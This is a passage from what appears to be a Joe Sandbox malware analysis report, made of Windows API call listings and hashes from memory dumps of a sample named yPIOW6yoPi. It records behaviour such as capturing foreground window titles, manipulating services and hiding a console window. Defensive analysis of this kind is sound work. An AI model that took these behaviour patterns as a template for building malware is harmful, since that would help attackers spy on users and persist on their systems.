                                                  • Instruction Fuzzy Hash: EA218272544301ABC694FB74DD498AE7BB9AB85710F800A28FA1282894EF34D608DA52
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                  • String ID:
                                                  • API String ID: 188215759-0
                                                  • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                  • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                  • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                  • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                  • String ID:
                                                  • API String ID: 188215759-0
                                                  • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                  • Instruction ID: ac9652ac0505f2516bc380b022d8dce95c4aa46cf73ff6b4d6a4b66dd2ee09c5
                                                  • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                  • Instruction Fuzzy Hash: 6F2121725083459FC304EF68D98489FB7E9EFC8754F054A2DF68593250EB74EA098BA3
                                                  APIs
                                                    • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                    • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                    • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                  • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                  • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                  • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                  • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                  • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 0210A063
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002), ref: 0210A077
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0210A084
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0210A0B9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$ChangeCloseConfigHandleManager
                                                  • String ID:
                                                  • API String ID: 110783151-0
                                                  • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                  • Instruction ID: 2d72cbf7876cbf09076c92c96980e6705ecf1a5090e42721994334fa8a50dd91
                                                  • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                  • Instruction Fuzzy Hash: 5201F5321883187EE6215B38AC9EF7F3EACDF466B0F000325F722961D6DB90D901C5A0
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                  • String ID:
                                                  • API String ID: 3604237281-0
                                                  • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                  • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                  • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                  • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0210B90C,00000000,00000000,?), ref: 0210B835
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B852
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B866
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B873
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                  • String ID:
                                                  • API String ID: 3604237281-0
                                                  • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                  • Instruction ID: a6a10c406fbe68d160daee752661ed3ad9f19ee7e21b2ed9a019a61e5fddee38
                                                  • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                  • Instruction Fuzzy Hash: 7E01D27128D214BFE6144E24ACC9F7B739CEB8627DF00063AFA61C21E1D7A1CE058678
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                  • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                  • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                  • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                  • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                  • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                  • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                    • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                    • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                  • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                  • String ID:
                                                  • API String ID: 737400349-0
                                                  • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                  • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                  • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                  • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                  • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                  • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                  • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                  • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                  • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                  • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                  • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B8AE
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B8D3
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,020F3D5A,00465324), ref: 0210B8E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                  • Instruction ID: ebec845a35412b42efaffd8549f42acf2ef62a7fe5f1cb7d6c98bcae5c99a4ce
                                                  • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                  • Instruction Fuzzy Hash: F7F0FCB12853047FE2101B20FCC4FBF375CDB866A9F000239FD11921D1CB614D059574
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                  • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                  • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                  • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                  • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                  • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                  APIs
                                                  • AllocConsole.KERNEL32 ref: 0210C120
                                                  • GetConsoleWindow.KERNEL32 ref: 0210C126
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0210C139
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0210C15E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$Window$AllocOutputShow
                                                  • String ID:
                                                  • API String ID: 4067487056-0
                                                  • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                  • Instruction ID: 9a41bfcbe2ff8e2544b4deba4b755994cb5bf4c16c665391d8f639bebce93798
                                                  • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                  • Instruction Fuzzy Hash: A40112B1AC0308BFD610FBF19D4AF9E77AEAB14701F500462B644EB1D1EBB9D5084E59
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020), ref: 02109E96
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020), ref: 02109EAA
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 02109EB7
                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 02109EC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseControlHandleManager
                                                  • String ID:
                                                  • API String ID: 1243734080-0
                                                  • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                  • Instruction ID: a0ff6893ac066d33529e2a61c89f3b78e282ddd7a9ebba51e2f5b88dc8e9f0fa
                                                  • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                  • Instruction Fuzzy Hash: 36F09036540318BFD7117B64AC89EBF3BACDB85AA1B000035FA06921D2DBA4DD46DAB4
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 02109F98
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 02109FAC
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 02109FB9
                                                  • ControlService.ADVAPI32(00000000,00000002,?), ref: 02109FC8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseControlHandleManager
                                                  • String ID:
                                                  • API String ID: 1243734080-0
                                                  • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                  • Instruction ID: f961f415bd94217aa72db777bf033dfe7de1dd3599fcf8b7b5578c76c57d825d
                                                  • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                  • Instruction Fuzzy Hash: D2F0F072544318BFD3106B24AC89EBF3FACDB44AA1B000035FA06A21C2DB64CD06DAB4
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 02109FFD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 0210A011
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0210A01E
                                                  • ControlService.ADVAPI32(00000000,00000003,?), ref: 0210A02D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseControlHandleManager
                                                  • String ID:
                                                  • API String ID: 1243734080-0
                                                  • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                  • Instruction ID: c6396da77786f4e3488a25401460b0349a301096b3514f8280b4ddc1b6f786e6
                                                  • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                  • Instruction Fuzzy Hash: E9F062725403186BD2216B64EC89EBF3AACDF45AA1B000035FB05961D2DB68D9059AB5
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,02109A81,00000000,00000000), ref: 02109E34
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,02109A81,00000000,00000000), ref: 02109E49
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,02109A81,00000000,00000000), ref: 02109E56
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,02109A81,00000000,00000000), ref: 02109E61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseHandleManagerStart
                                                  • String ID:
                                                  • API String ID: 2553746010-0
                                                  • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                  • Instruction ID: 8d4d1d33f6e53e6ce0d4b674f1630812c59c3e7a1556ae7c77b2cd742616e986
                                                  • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                  • Instruction Fuzzy Hash: D0F08972545318AFD2115B30AC88EBF3AACEF85AA2B000439F50192191DB64CD05D975
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,020F4AA6,00000001,?,?,00000000,00475B70,020F1A5A), ref: 020F4D54
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,020F1A5A), ref: 020F4D60
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,020F1A5A), ref: 020F4D6B
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,020F1A5A), ref: 020F4D74
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID:
                                                  • API String ID: 2993684571-0
                                                  • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                  • Instruction ID: a47084bfeceebbc187daa535a8947e15149a413ebfb05d6f88a0b40608fecad0
                                                  • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                  • Instruction Fuzzy Hash: 54F0E0755847107FDB5137B49D0E6BB7F99EB01311F0009BAFF4282AB1D6748450DB5A
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 0210C0E0
                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 0210C0ED
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0210C0FA
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0210C10D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID:
                                                  • API String ID: 3024135584-0
                                                  • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                  • Instruction ID: 9572edef1c9fcb62a493dbaeec272b1a0c5f3ef08cb44fea78124464144797d8
                                                  • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                  • Instruction Fuzzy Hash: 31E04F62204348ABD31427F5BC8DCAB3B6CE784613B101535F61291393EA7488448A75
                                                  APIs
                                                  • FindResourceA.KERNEL32(0046BC64,0000000A,00000000), ref: 0210A8B7
                                                  • LoadResource.KERNEL32(00000000,?,?,020FE3EA,00000000), ref: 0210A8CB
                                                  • LockResource.KERNEL32(00000000,?,?,020FE3EA,00000000), ref: 0210A8D2
                                                  • SizeofResource.KERNEL32(00000000,?,?,020FE3EA,00000000), ref: 0210A8E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                  • Instruction ID: 7f2b417d534a6045671c50af9bb34accdc5ee3c5ada4f87744e601cfa1805cea
                                                  • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                  • Instruction Fuzzy Hash: 7CE01A3A200710ABCB211BA5BC8CD477E39EB86B633100036FA0582331DB358840DA58
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: bb05039bd10173984d8ac256ef46a28b781231ebc573ca9b653a1b6ddea24a85
                                                  • Instruction ID: 6cd772d4c398a4b5ef552dfe58f1dbace042272c8e1ac74ab4e8dcdd0379e57e
                                                  • Opcode Fuzzy Hash: bb05039bd10173984d8ac256ef46a28b781231ebc573ca9b653a1b6ddea24a85
                                                  • Instruction Fuzzy Hash: F791E570D842699FCF24CF69C8506EEBBB6EF45224F18825AF871A7380D3349569CF90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
